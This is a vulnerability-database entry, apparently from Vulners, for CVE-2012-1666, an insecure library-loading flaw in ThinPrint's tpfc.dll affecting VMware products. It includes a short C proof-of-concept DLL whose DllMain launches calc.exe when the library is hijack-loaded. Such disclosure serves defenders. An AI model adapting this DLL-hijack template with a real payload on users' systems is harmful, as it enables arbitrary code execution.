ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2012-1666 | 4 Sep 201200:00 | – | circl | |
| CVE-2012-1666 | 8 Sep 201210:00 | – | cve | |
| CVE-2012-1666 | 8 Sep 201210:00 | – | cvelist | |
| EUVD-2012-1676 | 7 Oct 202500:30 | – | euvd | |
| CVE-2012-1666 | 8 Sep 201210:28 | – | nvd | |
| VMware Workstation Insecure 'tpfc.dll' Code Execution Vulnerability - Windows | 1 Feb 201700:00 | – | openvas | |
| VMware Workstation Insecure 'tpfc.dll' Code Execution Vulnerability - Linux | 1 Feb 201700:00 | – | openvas | |
| VMware Player Insecure 'tpfc.dll' Code Execution Vulnerability - Windows | 1 Feb 201700:00 | – | openvas | |
| VMware Player Insecure 'tpfc.dll' Code Execution Vulnerability - Linux | 1 Feb 201700:00 | – | openvas | |
| VMware Fusion Insecure 'tpfc.dll' Code Execution Vulnerability - Mac OS X | 1 Feb 201700:00 | – | openvas |
10
// source: https://www.securityfocus.com/bid/55421/info
ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.
Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application.
#include <windows.h>
int hijack_poc ()
{
WinExec ( "calc.exe" , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
( HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Aug 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.9
EPSS0.00784